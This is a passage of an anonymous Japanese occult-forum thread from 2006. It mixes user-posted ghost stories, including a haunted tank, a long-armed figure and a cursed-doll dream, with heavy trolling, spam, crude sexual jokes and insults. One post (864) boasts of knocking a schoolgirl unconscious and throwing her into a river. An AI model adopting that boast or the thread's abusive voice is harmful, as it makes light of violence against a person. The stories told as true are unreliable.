743 :本当にあった怖い名無し:2006/10/13(金) 18:19:54 ID:NyveeYMyO
>>740 続き

その道中、落ちた事をからかいながら話してると、その職人さんが、

「いや、いきなり頭つかまれた」
んな事あるかい、とさらにからかってると、もういいよとふてくされてしまった。

着替えを買って現場に戻ると何やら人だかりが。
もう一人の職人さんが解体準備をしてる最中、梯子から落ちたらしい。腰を少し打っただけで大事にいたらず、事務所の好意で少し横にならせてもらう事に。
んで、怪我した時の状況を確認すると、

「急に後ろに引っ張られた」

らだと。

744 :本当にあった怖い名無し:2006/10/13(金) 18:28:10 ID:NyveeYMyO
>>743 続き

こいつら二人揃って何いってんだ?
と呆れ返ってると、その話を聞いてた事務のお姉さんが、

「やっぱり」

何がやっぱりなのか聞いてみると、5年ほど前そのタンクで落下事故があったとの事で、
その時タンク内には塩酸が入っていて、大火傷の上、そのまま死んでしまったらしい。
それ以来タンク周辺で不可解な事が起こると。

745 :本当にあった怖い名無し:2006/10/13(金) 18:39:50 ID:NyveeYMyO
>>744 続き

まぁ、気持ち悪いっていっても仕事止めるわけにはいかないので、注意しながらなんとか解体を終わらせた。

廃材をトラックにつんで、別の車に機材を乗せて帰ってる最中警察に止められた。

「荷台に人乗せて走るな」

あ?何言ってんだか。
とりあえず職人さんを先に帰らせて、荷台チェック。
いるわけないだろ。廃材しか積んでないっての。
警官二人は平謝り。

746 :本当にあった怖い名無し:2006/10/13(金) 18:45:32 ID:NyveeYMyO
>>745 続き

さぁ、腹も減ったし早く帰るか。

ってな状況の今現在。


荷台に人がいました。
バックミラー越しに目から上がちらちらと。

つーか人か?
薄ぼんやりして、そこだけ焦点あってないみたいな。


サービスエリアにてガクブル中なのですが、どうしようかと。
とりあえず塩まけばいいか?

747 :本当にあった怖い名無し:2006/10/13(金) 18:55:44 ID:NOjuyNYzO
>>1-1001
黙れ小僧〜

748 :本当にあった怖い名無し:2006/10/13(金) 20:07:43 ID:wTkJfnj0O
ナポリタン気になってた!
知ってる人ヒントお願いします。

749 :本当にあった怖い名無し:2006/10/13(金) 20:12:11 ID:NOjuyNYzO
>>748
いやあれ釣りだよ…

750 :本当にあった怖い名無し:2006/10/13(金) 20:13:36 ID:3tHHkWaw0
言葉にして説明するのは、ちょっと難しいんだけど、発祥の地はイタリア。スパゲッティとゆう麺。ナポリタンの場合はトマト味だよ。

751 :本当にあった怖い名無し:2006/10/13(金) 20:16:25 ID:wTkJfnj0O
釣りなん(´・ω・`)
も一度検索して探そうかとか思っちゃった…

752 :本当にあった怖い名無し:2006/10/13(金) 20:19:32 ID:x6ylzQ7U0
とろろそばの話していい?

753 :本当にあった怖い名無し:2006/10/13(金) 20:24:05 ID:6catkQC+O
このスレ見て寝たらすごい怖い夢見た…
考えすぎか(´;ω;`)

754 :本当にあった怖い名無し:2006/10/13(金) 20:25:07 ID:NOjuyNYzO
>>752
揚げ足いれていい?

755 :本当にあった怖い名無し:2006/10/13(金) 20:25:11 ID:6catkQC+O
sage忘れゴメ

756 :本当にあった怖い名無し:2006/10/13(金) 20:26:50 ID:NOjuyNYzO
>>1-965
しっ!誰かする…

757 :1/2:2006/10/13(金) 20:26:53 ID:x6ylzQ7U0
昨日会社が6時ぐらいに終わって、帰ってからコンビニで弁当買って食べようと思ったんだけど
その日はなぜか駅で食べてっちゃおうかなと思ったわけ。
よくあるでしょ、箱根そば?とか駅に。
あんまり綺麗な店でもなかったので一瞬迷ったけどお腹空いてたからはいったんだわ。
はいったら入ったでまぁいい匂いするし、早速食べようと思ったの。
食券買ってね。

758 :新〇結衣:2006/10/13(金) 20:28:59 ID:NOjuyNYzO
ぷりっ

759 :2/2:2006/10/13(金) 20:29:43 ID:x6ylzQ7U0
でもやっぱり結構時間も時間だから並んでるんだわ。
こんだけ並んでたら食べる席あるかなぁ?って感じたんだわ。
でも立ち食いだからいいか?なんて自分でいってて凄くおかしくて
( ´,_ゝ`)プッって噴出したりしてたんだわ。
そしてやっと自分の前の人の番になったらすごくもたついてるわけ。
なんかすごくイライラしてきたけど、ここは我慢。我慢。


760 :本当にあった怖い名無し:2006/10/13(金) 20:30:45 ID:NOjuyNYzO
だわだわうるしゃいなぁ

761 :本当にあった怖い名無し:2006/10/13(金) 20:32:19 ID:pYjUlG4v0
>>739

全員いっせーのせで仕事やめればイイんだよ。

あとナポリタンうぜえよ。

762 :3/2:2006/10/13(金) 20:32:46 ID:x6ylzQ7U0
まちがって送信してしまったwww

続き
そして自分の番がきたわけ。
なんとなくつかれてたし、卵はいったのでも食べたいな。
そんなふうに思ってたの。
でも、ないんだよね。月見そば。
もちろんうどんも。
えー月見ないのかよ?って一瞬思ったけど。
まぁとろろそばでいいか。(うどんもあった)
って思って、とろろそばの食券を買ったんだ。

で、結局とろろそばを食べたんだけど、結構おいしかった。
ま、月見じゃないけどいいか。って思ってお腹いっぱいになって帰った。

763 :本当にあった怖い名無し:2006/10/13(金) 20:35:29 ID:pYjUlG4v0
2/3
ってのがオカルトだよ。

764 :新垣〇衣:2006/10/13(金) 20:35:30 ID:NOjuyNYzO
うどんよりも蕎麦、蕎麦よりもチョコ!でおなじみの新〇結衣だす。
とろろそばってあるじゃないですか〜あの白くて粘着質のあるちょっと臭みのあるグロテスクなのが乗っかってる蕎麦…。
あれを昨日マツナガと一緒に頼んだんですよ〜
そしたらね〜…

765 :本当にあった怖い名無し:2006/10/13(金) 20:36:31 ID:pYjUlG4v0
間違った
3/2ってのがオカルトだよ。

766 :本当にあった怖い名無し:2006/10/13(金) 20:37:03 ID:x6ylzQ7U0
>>764
マツナガ売ってた?
どこで?
kwsk!!!

767 :本当にあった怖い名無し:2006/10/13(金) 20:39:03 ID:NOjuyNYzO
>>766
え!?マツナガって???kwsk!!

768 :本当にあった怖い名無し:2006/10/13(金) 20:48:07 ID:x6ylzQ7U0
>>767
マツナガ知らないの?
アイカゴっていう馬鹿が食べたとか言ってたよ

769 :本当にあった怖い名無し:2006/10/13(金) 20:50:38 ID:pYjUlG4v0
>>762

終わりかよ

770 :本当にあった怖い名無し:2006/10/13(金) 20:50:42 ID:6catkQC+O
>>154が地元な件について

771 :アイカゴ:2006/10/13(金) 20:50:56 ID:NOjuyNYzO
>>768
お前昨日も俺様の悪口言った奴だろ?

772 :本当にあった怖い名無し:2006/10/13(金) 20:53:13 ID:x6ylzQ7U0
>>771
今日からインターネッツはじめました

773 :本当にあった怖い名無し:2006/10/13(金) 20:55:17 ID:lVVWeNIi0
コワイ話ししてチョーダイ!

774 :本当にあった怖い名無し:2006/10/13(金) 20:57:13 ID:NOjuyNYzO
>>772
ぴゃーっうそちゅけーっぴゃーっ

775 :The アイカゴ:2006/10/13(金) 20:57:22 ID:x6ylzQ7U0
きつねうどんの話でもいいですか?

776 :本当にあった怖い名無し:2006/10/13(金) 20:58:07 ID:NOjuyNYzO
トワイライトシンド…うそちゅけーっ

777 :アイカゴHYPER:2006/10/13(金) 20:58:58 ID:x6ylzQ7U0
>>776
トワイライトシンドってなに?
kwsk!!!

778 :アイカゴリ-ダ-:2006/10/13(金) 21:00:32 ID:NOjuyNYzO
しっ!kwsk…

779 :アイカゴMAX:2006/10/13(金) 21:04:02 ID:x6ylzQ7U0
通報したからな↓

444 名前:住人[] 投稿日:2006/10/13(金) 20:56:29 HOST:61-208-219-85.fgo.jp
削除対象アドレス: 

http://hobby7.2ch.net/test/read.cgi/occult/1160042683/735-736
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/742
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/747
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/749
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/754
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/757-760
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/762
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/764-768
http://hobby7.2ch.net/test/read.cgi/occult/1160042683/771

削除理由・詳細・その他: 

4.投稿目的による削除対象 
(議論を妨げる煽り。第三者を不快にする暴言) 
5.掲示板・スレッドの趣旨とは違う投稿 
(故意にスレッドの運営・成長を妨害) 

長い期間荒し行為が継続されています。(おそらく2名)
まとめサイトも存在する、伝統のあるスレなので
お手数ですが対処のほど宜しくお願い致します。



780 :アイカゴMAX:2006/10/13(金) 21:07:41 ID:x6ylzQ7U0
お前ら通報したからな
アク禁だぞ
わかったか
occult:オカルト[レス削除]
http://qb5.2ch.net/test/read.cgi/saku/1125506999/


781 :本当にあった怖い名無し:2006/10/13(金) 21:13:57 ID:x6ylzQ7U0
ブルドッグ

782 :本当にあった怖い名無し:2006/10/13(金) 22:01:06 ID:ueafNJA+O
>>740タンクは何メートルぐらいの高さがあるんですか?

783 :本当にあった怖い名無し:2006/10/13(金) 22:05:45 ID:Sw9MyW+f0
I felt that an angel had come down to me.
And my heart was filled up by you.
I am I
SEX
Everyday seemed heaven, then, till then.
night 0f knight.
North Korea will threaten all the world(top among them: Japan) with nuclear weapon.
If it successfully creats nuclear bombs, then the nation will
sell some of them to their friendly nations, terrorists, and
other in favor of NK. This is a big problem. NK is a kind of
nation which makes fake money and illegal drugs.
But, I went away and left you with a trivial thing.
I shouded have shouted to you.
But I couldn't see anything without the front.
Or rather, I didn't try to see.

And I didn't try to know your feelings.
Shame on me.
I acted on a cheap impulse.
Shame on me.
I didn't feel that I lost you in such a thing.
You were right, I was wrong
But, I can say only these words.
"You have never been in the world yet, but I still love you truly"

784 :本当にあった怖い名無し:2006/10/13(金) 22:07:55 ID:Sw9MyW+f0
Give me a whisper
And give me a sign
Give me a kiss before you
tell me goodbye
Don't you take it so hard now
And please don't take it so bad
I'll still be thinkin' of you
And the times we had...baby

785 :本当にあった怖い名無し:2006/10/13(金) 22:24:11 ID:0PHR9RsHO
そろそろ、切れていいか?

786 :本当にあった怖い名無し:2006/10/13(金) 22:43:26 ID:NOjuyNYzO
>>785
どうぞ

787 :本当にあった怖い名無し:2006/10/13(金) 22:44:42 ID:x6ylzQ7U0
ギスギスしないで仲良くやろーぜ

788 :本当にあった怖い名無し:2006/10/13(金) 22:55:29 ID:NOjuyNYzO
おい荒らしはそのくらいにしてコワバナしようぜ、コワバナ!!

789 :本当にあった怖い名無し:2006/10/13(金) 23:13:17 ID:x6ylzQ7U0
>>788
さんざん荒らしといて何言ってんだよ。
コワバナ聞きたかったらまずお前からコワバナしてみろよ。

790 :本当にあった怖い名無し:2006/10/13(金) 23:24:48 ID:pvehuKuB0
ふと、学生時代に目撃した、オバケ?のことを思いだした。

791 :本当にあった怖い名無し:2006/10/13(金) 23:25:00 ID:NOjuyNYzO
>>789
すまん、できんすまん

792 :本当にあった怖い名無し:2006/10/13(金) 23:47:48 ID:pvehuKuB0
高校生のとき、部活で剣道やってたんだけども、当然、休日も部活はあるわけよ。

当時、高校一年生だったんで、先輩達より早くに出てきて武道場の整備を
しなくちゃなんなかったんだけど、相当早い時間だったにも関わらず先客がいたのね。

その子(?)、武道場の天井近くの窓を素手で開けてるのよ。
最初は、“あ、誰かいるんだ”と思ってたんだけど、
よく考えてみたら天井近くのドアを素手でなんて開けられないわけよ。
どうみたって、窓の鍵まで3メートル近くはあるんだし。

武道場から校庭挟んだフェンスの向こうから
目視しただけなので目を凝らして見てる状態なんだけども。
でも、よぉぉぉく見ても、やっぱり素手で開けてるわけよ。
よく見ると、腕の部分が異様に長いんだよね・・・・。

急いで、武道場に急行したんだけども誰もいない罠。
でも天井近くの窓が、3つほど開け放してあった・・・。
後から来た部員に聞いてみても、皆「知らない」と言う。。。

その窓、いつもは開けない場所なんだけどね。。。

(おしまい)

793 :本当にあった怖い名無し:2006/10/13(金) 23:48:46 ID:9mwMU+Oe0
>>96のつづき
母にビビりながらもまた外を見る。
まだ居る。
「何こぼしたん?コレ…」
いいから!ちょっ…!外見てみ!チャリ置き場みてみ!!と、ジェスチャーで伝えるオレ。
母は眉にシワ寄せながら窓を全開にして外を覗いた。
しばらくキョロキョロした後、固まる母。
「なっ!?見えるだろ!?」
返事もせずに静かに窓を閉め、カーテンを閉める母。
「いるんだねぇ、ああいうの…」
間違いない。居るんだ。幻覚じゃない。母により確信した。
思いついた様な顔して母「あんたさぁ、さっき外行った?」
…は?不意の質問。
「何それ。どういうこと?」
母「さっき、あんたの声で玄関から『行ってきます』って聞こえたんよ。いつの間に玄関いったのかと思って見に行ったんだけど…靴あるし、変だなぁと思ってこっちの部屋来てみたん」
そしてオレに声をかけたらしい。
の日は二度と外を確認する事なく、母もオレも寝た。ちなみに姉には内緒ということで。ビビりなんで。

次の日、元気なガキんちょ達の遊ぶ声で目が覚めた。…窓が開いていた。母が開けたのだろう。

外へ確認しにでる。階段の踊り場から駐輪場を見るが、…何もなかった。結局何もかにも謎だらけ


この一件により、オレと母は霊の類を信じざるを得なくなった。

今はもう社宅は取り壊されてしまったので、何も確認しようがないんですが

794 :本当にあった怖い名無し:2006/10/13(金) 23:49:59 ID:9mwMU+Oe0
>>96のつづき
母にビビりながらもまた外を見る。
まだ居る。
「何こぼしたん?コレ…」
いいから!ちょっ…!外見てみ!チャリ置き場みてみ!!と、ジェスチャーで伝えるオレ。
母は眉にシワ寄せながら窓を全開にして外を覗いた。
しばらくキョロキョロした後、固まる母。
「なっ!?見えるだろ!?」
返事もせずに静かに窓を閉め、カーテンを閉める母。
「いるんだねぇ、ああいうの…」
間違いない。居るんだ。幻覚じゃない。母により確信した。
思いついた様な顔して母「あんたさぁ、さっき外行った?」
…は?不意の質問。
「何それ。どういうこと?」
母「さっき、あんたの声で玄関から『行ってきます』って聞こえたんよ。いつの間に玄関いったのかと思って見に行ったんだけど…靴あるし、変だなぁと思ってこっちの部屋来てみたん」
そしてオレに声をかけたらしい。
その日は二度と外を確認する事なく、母もオレも寝た。ちなみに姉には内緒ということで。ビビりなんで。

次の日、元気なガキんちょ達の遊ぶ声で目が覚めた。…窓が開いていた。母が開けたのだろう。

外へ確認しにでる。階段の踊り場から駐輪場を見るが、…何もなかった。結局何もかにも謎だらけ


この一件により、オレと母は霊の類を信じざるを得なくなった。

今はもう社宅は取り壊されてしまったので、何も確認しようがないんですが。

795 :本当にあった怖い名無し:2006/10/13(金) 23:51:51 ID:9mwMU+Oe0
793-794は無視

796 :本当にあった怖い名無し:2006/10/13(金) 23:57:50 ID:NOjuyNYzO
ピッチャーびびってる!

797 :本当にあった怖い名無し:2006/10/14(土) 00:01:27 ID:cAZQHguGO
>>795
昨日オレが投下した話だ…
一瞬、混乱した

798 :本当にあった怖い名無し:2006/10/14(土) 00:08:54 ID:/WkLfr6J0
>>796
えっ?どこのピッチャー??
kwsk!!!

799 :本当にあった怖い名無し:2006/10/14(土) 00:12:03 ID:Pvpxg0Xl0
スルーされても、泣かないんだからっっ。

800 :本当にあった怖い名無し:2006/10/14(土) 00:27:50 ID:03naDqJd0
>>783>>784

Exciteで翻訳

「私は、天使が私に落ちたのを感じました。 そして、私の心臓はあなたによって満たされました。 私は私です。
セックス
そして、毎日、天国はその時まで見えました。 夜の0fナイト。 北朝鮮は核兵器がある全世界(それらの中の先端: 日本)を脅かすでしょう。
首尾よく核爆弾をcreatsすると、国はNKを支持してそれらのいくつかをそれらの友邦、テロリス
ト、およびもう一方に販売するでしょう。 これは重要な問題です。 NKは偽金と違法薬物を作る
一種の国です。 しかし、私は、遠ざかって、あなたに些細なものを残しました。 shoudedされたIはあなたに叫びました。
しかし、私は前部なしで何も見ることができませんでした。 または、むしろ、私は見ようとしませんでした。

そして、私はあなたの気持ちを知ろうとしませんでした。 私の上の恥。 私は安い衝動に影響しました。
私の上の恥。
私は、そのようなものであなたを失ったと感じませんでした。 あなたが正しかった、間違ったButであった、私はこれらの言葉しか言うことができません。
「あなたはまだ世界に一度もいませんが、本当に、私はまだあなたを愛しています」

ささやき声を私に与えてください。そして、サインを私に与えてください。前で私にキスをしてください。さようならを私に言ってください。
あなたが現在非常に一生懸命それを取らないので、Andは私が、Andが私たちが
持っていた時であるとまだあなたと思っているほど悪い状態でそれを取らないでください…赤ん坊」

あなたはあなたですか、そうですか。
セックス。

801 :本当にあった怖い名無し:2006/10/14(土) 00:34:20 ID:i0+lkAgAO
セックスって気持ちいいのかな?

802 :本当にあった怖い名無し:2006/10/14(土) 00:35:56 ID:87ZPb+Yv0
>>801
自分自身のagesageによる

803 :本当にあった怖い名無し:2006/10/14(土) 00:39:17 ID:i0+lkAgAO
>>802
セックス、否トンクス。

804 :本当にあった怖い名無し:2006/10/14(土) 00:41:13 ID:rdMjO9UE0
>>215
最後までうpしてくれてありがとう。
洒落になってないけど読んでてわくわくした。
携帯から長文乙乙。

805 :本当にあった怖い名無し:2006/10/14(土) 00:51:03 ID:i0+lkAgAO
森山未来と大人計画の星野源てさぁ〜何となくイキフン似てない〜?

806 :本当にあった怖い名無し:2006/10/14(土) 01:02:07 ID:Xc8LIy+S0
つい最近見た夢なんだが
俺が自室でくつろいでいると妹(6歳ぐらい)が入ってきた。
妹曰く道端でヌイグルミを拾ったけど糸が絡まってるから取って欲しいとのこと。
それはうさぎのヌイグルミのようだが、ボロボロで汚れてるし何より全く可愛くない。
体はちょうど人間がうさぎの着ぐるみを着た感じなんだけど、顔がとにかく不気味。
目が飛び出していて鬼のような形相だった。
その絡まってる糸というのが首の部分に何重にも巻きつけられたようになってて、
まるでその糸で首を絞められてもがき苦しんだような・・
現実ならそんなヌイグルミ捨てて来いと言いたいところだが、夢の中の俺は何も言わず手にとって
糸をほどき始めた。ここからが夢とはいえめちゃくちゃ怖かった。
糸をほどくにつれて飛び出した目の上の額のあたりが盛り上がってきた。
俺はすぐにそれはツノだと判断した。その異変に気付いた妹は当然無邪気に聞いてくる。
「ねぇ〜ねぇ〜なんで〜ねぇなんでなんで〜どうして〜ねぇねぇ」
妹は妙に抑揚のない声で聞いてくる。まるで壊れた機械のように繰り返し繰り返し。
俺は突然『これ以上糸をほどいてはいけない』ということを直感した。
さらに・・・『いま妹の顔を見てはいけない』ということも・・・
「ねぇなんでなんで〜どうして〜?ねぇねぇねぇねぇねぇねぇ・・」
依然として俺に問いつづける妹の影にはヌイグルミと同じツノがはっきり見て取れた。
・・・とここで目が覚めたんだけど、しばらくは得体の知れない恐怖に震えていた。
あのまま糸をほどき続けていたら俺はどうなったんだろうか・・・
ちなみに上で6歳‘ぐらい’と書いたのは、実際は俺に妹なんていないから。
妹欲しいと思ってたけどあんな妹ならイラネ( ゚д゚)、

807 :本当にあった怖い名無し:2006/10/14(土) 01:05:55 ID:/WkLfr6J0
>>784はガンズのドントクライじゃないか?

808 :本当にあった怖い名無し:2006/10/14(土) 01:07:48 ID:i0+lkAgAO
>>806
俺荒らしだけど素直にアンタの文に寒気をかんじたよ…。
油断してみたら超怖いじゃないっすか…。
操作ならスゲーな。才能あんぜ!

809 :本当にあった怖い名無し:2006/10/14(土) 01:21:04 ID:2VRTGEzF0
>>806
ただでさえつまらん夢の話の中で、かなり程度の低い話乙。

810 :本当にあった怖い名無し:2006/10/14(土) 01:31:40 ID:i0+lkAgAO
>>809
嫉妬〜(^-^)

811 :本当にあった怖い名無し:2006/10/14(土) 01:32:16 ID:/WkLfr6J0
>>809
じゃなんか怖い話してみろよカス

812 :本当にあった怖い名無し:2006/10/14(土) 01:36:13 ID:2VRTGEzF0
>>811
何が「じゃなんか」なんですか?
kwsk!!

813 :もこ:2006/10/14(土) 01:36:37 ID:CtvD2GiwO
おはよんちゃんねる

814 :本当にあった怖い名無し:2006/10/14(土) 01:36:57 ID:i0+lkAgAO
>>811
ちょっそれは言い過ぎw出来る訳ないよ低能だもん〜(^o^)

815 :本当にあった怖い名無し:2006/10/14(土) 01:37:53 ID:/WkLfr6J0
>>813
あーもこだ!
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ

816 :本当にあった怖い名無し:2006/10/14(土) 01:38:20 ID:i0+lkAgAO
>>812
死ねよお前!!

817 :本当にあった怖い名無し:2006/10/14(土) 01:39:15 ID:/WkLfr6J0
>>816
アイちゃん言い過ぎーwww

818 :本当にあった怖い名無し:2006/10/14(土) 01:39:59 ID:i0+lkAgAO
しっ!チャンコ食う…

819 :本当にあった怖い名無し:2006/10/14(土) 01:41:29 ID:/WkLfr6J0
岩田さゆり!!!

820 :MU-100R@PC ◆aREMPBr7cs :2006/10/14(土) 01:42:05 ID:JEJI4oSF0
ID:/WkLfr6J0
ID:i0+lkAgAO
セット完了

821 :本当にあった怖い名無し:2006/10/14(土) 01:42:40 ID:i0+lkAgAO
>>817
どうしてわかった!!
(津川アイ彦)

822 :本当にあった怖い名無し:2006/10/14(土) 01:44:18 ID:i0+lkAgAO
>>820
アニオタか!!
これでいい?

823 :本当にあった怖い名無し:2006/10/14(土) 01:44:43 ID:/WkLfr6J0
あれ?

824 :本当にあった怖い名無し:2006/10/14(土) 01:45:14 ID:/WkLfr6J0
違う違う違う違う違う違う違う違う違う違う違う違う違う違う違う違う違う違う違う

825 :MU-100R@PC ◆aREMPBr7cs :2006/10/14(土) 01:45:45 ID:JEJI4oSF0
ID:/WkLfr6J0
ID:i0+lkAgAO
は一人が携帯とPCでやってるのか・・・
此処には俺と・・・この二人しか居ないみたいだから他行って来ます。
おやすみぬるぽ!

826 :本当にあった怖い名無し:2006/10/14(土) 01:47:14 ID:/WkLfr6J0
ぬるぽだって馬鹿みたい(プ

827 :本当にあった怖い名無し:2006/10/14(土) 01:47:24 ID:i0+lkAgAO
>>825
こいつ荒らしじゃね?
ガッ

828 :本当にあった怖い名無し:2006/10/14(土) 01:48:03 ID:03naDqJd0
>>806

うん、一応秀逸だと思う。個人的には好きこういうの。

829 :本当にあった怖い名無し:2006/10/14(土) 01:48:24 ID:i0+lkAgAO
>>826
がっ

830 :本当にあった怖い名無し:2006/10/14(土) 01:49:27 ID:/WkLfr6J0
さすがアイちゃんは抜かりないな

831 :本当にあった怖い名無し:2006/10/14(土) 01:50:21 ID:i0+lkAgAO
>>828
なー結構ゾクって来るものが何箇所かあるよな

832 :本当にあった怖い名無し:2006/10/14(土) 01:56:18 ID:2VRTGEzF0
あれ?
IDが1つ増えてるよ?

833 :本当にあった怖い名無し:2006/10/14(土) 01:58:49 ID:/WkLfr6J0
なんだPV流すだけかこの番組・・・

834 :本当にあった怖い名無し:2006/10/14(土) 02:04:16 ID:i0+lkAgAO
>>833
ナンチャンみてんの?
10ちゃん見なよ〜

835 :本当にあった怖い名無し:2006/10/14(土) 02:08:49 ID:/WkLfr6J0
陣内氏ね

836 :本当にあった怖い名無し:2006/10/14(土) 02:09:25 ID:/WkLfr6J0
とらぶりゅうキタ━━━━━━(゚∀゚)━━━━━━!!!!!!

837 :本当にあった怖い名無し:2006/10/14(土) 02:14:20 ID:i0+lkAgAO
普通に高橋のききたかった…

838 :本当にあった怖い名無し:2006/10/14(土) 02:15:40 ID:i0+lkAgAO
ろくなもんじゃねー!

839 :本当にあった怖い名無し:2006/10/14(土) 02:16:41 ID:/WkLfr6J0
ヨーソロー

840 :30 ◆RPG8JNHiII :2006/10/14(土) 02:20:40 ID:TscjzSlW0
久々に着たら何ですかこれはw
程度の低い荒らしはでてってもらえませんかね?

841 :本当にあった怖い名無し:2006/10/14(土) 02:28:06 ID:i0+lkAgAO
>>840
久しぶりって何月以来?アイカゴしっとるん?

842 :本当にあった怖い名無し:2006/10/14(土) 02:31:45 ID:/WkLfr6J0
>>841
アイカゴ知ってるんですか?!
kwsk!!!!

843 :本当にあった怖い名無し:2006/10/14(土) 02:32:49 ID:i0+lkAgAO
>>842
アイカゴ!?
kwsk???

844 :本当にあった怖い名無し:2006/10/14(土) 02:43:13 ID:/WkLfr6J0
>>843
あ、ごめん人違いだ
あなたがアイカゴっていう糞野郎かと思ったw

845 :本当にあった怖い名無し:2006/10/14(土) 02:46:40 ID:AJsXQgzQ0
ある若者が紅葉を見に山深い場所へドライブに行った帰り道の事。

突然の尿意に襲われた彼は、山道の路肩に車を止めると…
まぁその、手近な茂みに向かってマナー違反で法律違反の行為に及ぶ事で尿意を鎮めた訳だ。

しかし、その時 彼の股間に鋭い痛みが走った。
見れば、マムシが噛み付いているではないか。
しかも噛み付いた場所が問題だ。
腕や足なら兎も角も、状況からして御約束とでも言うべきか、蛇は彼の一物に噛み付いていた。

直ぐに毒を吸い出さなくてはならない。
しかし、幸か不幸か彼は自分で自分の一物に吸い付けるほど柔軟な体の持ち主じゃなかった。
このままでは毒が回る一方だ。誰かに毒を吸い出してもらわなければ――

ところで、ここでこの話にもう一人の登場人物が居る事を話しておかなければならない。
その人物は、その日彼と一緒に紅葉を見に来た彼の友人であり、友人の生命の危機など知らず車の中で待っている。

何とも運の良い事に…いや、悪い事に?


その友人はゲイなのだ。

846 :本当にあった怖い名無し:2006/10/14(土) 02:48:08 ID:/WkLfr6J0
アッー!

847 :もこ:2006/10/14(土) 02:51:21 ID:CtvD2GiwO
もこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこ

848 :本当にあった怖い名無し:2006/10/14(土) 02:52:12 ID:i0+lkAgAO
>>846
テメーは楽しく荒らしが出来ねぇのか…俺様を見習えよ、低能糞野郎が!!

849 :本当にあった怖い名無し:2006/10/14(土) 02:55:24 ID:i0+lkAgAO
なんて!

850 :本当にあった怖い名無し:2006/10/14(土) 02:57:25 ID:/WkLfr6J0
>>848
荒らしじゃないよ
>>847
あーもこだ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ
もこもこもこもこもこもこもこもこもこもこもこもこもこもこもこ

851 :ジョルノ・アイバーナ:2006/10/14(土) 03:02:38 ID:i0+lkAgAO
>>850
お前は本当に低能糞野郎なのか!
僕は調べて学会で発表する!!
僕には夢がある!!

852 :本当にあった怖い名無し:2006/10/14(土) 04:16:30 ID:B5QiIM2XO
早くコワバナしてよ、



セックス

853 :本当にあった怖い名無し:2006/10/14(土) 04:44:06 ID:UzA4wlKxO
>>17
重ねたのはカーボン紙じゃね?

854 :本当にあった怖い名無し:2006/10/14(土) 05:04:29 ID:03naDqJd0
師匠シリーズって死ぬ程怖いか?
一応このスレの権威なのは認めるけど、また読みたいと思った話は一個もない。
「家族の奇行の真相」とか>>806とかの方がクるのだが。
権威モンでも新耳はさすがと思うが。




セックス


855 :本当にあった怖い名無し:2006/10/14(土) 05:13:32 ID:g4JqiO8/0
暇だから、今思い出したのを書く。
昔、車で旅行に行こうとしたんだけど、近所で
狭い路地をママチャリ(前後かご付き)乗るオッサン(70代)が
左右に揺られて邪魔だったんで、ゆっくり抜いたわけですよ。
で、高速乗って、1時間後IC降りたら、なんとビックリ、さっきの
オッサン(70代)がよろよろチャリ運転してんじゃないですか!
これには、ワロタw
恐怖感ないけど、気合があればテレポもできるってのが証明された事件ですたw

856 :本当にあった怖い名無し:2006/10/14(土) 05:32:16 ID:1yK+DfCYO
心温まる

857 :本当にあった怖い名無し:2006/10/14(土) 05:39:23 ID:Vn5eMjbCO
>>855
どこの高速っすか?ww
じっちゃん凄ぇwwwww

858 :本当にあった怖い名無し:2006/10/14(土) 05:41:46 ID:Vn5eMjbCO
sage忘れてた…
ホントすまんorz

859 :本当にあった怖い名無し:2006/10/14(土) 06:03:12 ID:R5DmfjlXO
気にすんな。
この胸で受け止めてやるから。

860 :本当にあった怖い名無し:2006/10/14(土) 06:16:44 ID:ZqljmmJy0
10年くらい前の話

俺の家から1kmくらいの場所にレンタルビデオ店があった。
個人経営ながら品揃えはかなり充実していた。エロビデオも今ではプレミア級のものばかり。
ある日、いつものように原付で店に行った。
夜の8時くらいだったかな、店には店主(40代くらいか?)とバイト(若い男)の二人。
いろいろ物色を始めると、隅っこの棚の一番下に何も印刷されてないパッケージのビデオを発見。
しかも1週間150円(普通のビデオは全部200円)。20本くらいはあった。よく見ると小さく「俺」と書かれてた。
気になったのでエロビデオ数本と一緒にこの「俺」を借りてみた。
家に帰ってさっそくその「俺」を再生。
すると、ホームビデオで撮影したであろう映像が流れた。
中年の男がカメラ目線でひたすら笑っているのだ。そのうち笑いをやめたと思ったら、
歯ぎしりを始めた。異常に強く。歯茎から微量の血が滴る.
今度は泣き出した。鼻水と鼻血垂らしながら。そして最後に生の牛肉を一心不乱に食い始めた。
30分くらいの映像だったが、おぞましい気違い男の衝撃が脳裏に焼き付いた。
あの男は誰なのか?なぜこんなビデオがあの店に?
ちなみに、このビデオの男はビデオ店の店主でもなければバイトでもない。
返却時に店主に聞いたところ、店主も配達業者が持ってきたから詳しく知らないと言っていた。
このビデオ店は、その2年後に潰れ、ビデオがどうなったかは知らない。



861 :本当にあった怖い名無し:2006/10/14(土) 06:21:11 ID:03naDqJd0
俺ワロスw

862 :本当にあった怖い名無し:2006/10/14(土) 06:22:39 ID:R5DmfjlXO
あぁ>>860
久しぶり!俺だよ俺!
ちょっと事故っちゃってさぁ…

863 :本当にあった怖い名無し:2006/10/14(土) 06:38:57 ID:uesYoS0e0
地震が来てビックリしたwww

864 :本当にあった怖い名無し:2006/10/14(土) 07:25:21 ID:rBsGuJNC0
さっきすれ違いざま「おっさんキモッ」と女子高生?に言われた
まだ二十歳前の俺はムカついたんで一発殴った
倒れて気を失ったみたいなので、ちょうど橋の上だったから川になげこんでやった


865 :本当にあった怖い名無し:2006/10/14(土) 08:23:27 ID:0lSg6VtQ0
>>864
それはやばいんでないかいw?

866 :ヒコマロン:2006/10/14(土) 08:41:18 ID:i0+lkAgAO
宍粟酢飲んで〜少し運動してみ〜これホンマやせんでっホンマやから一回は試してみて〜

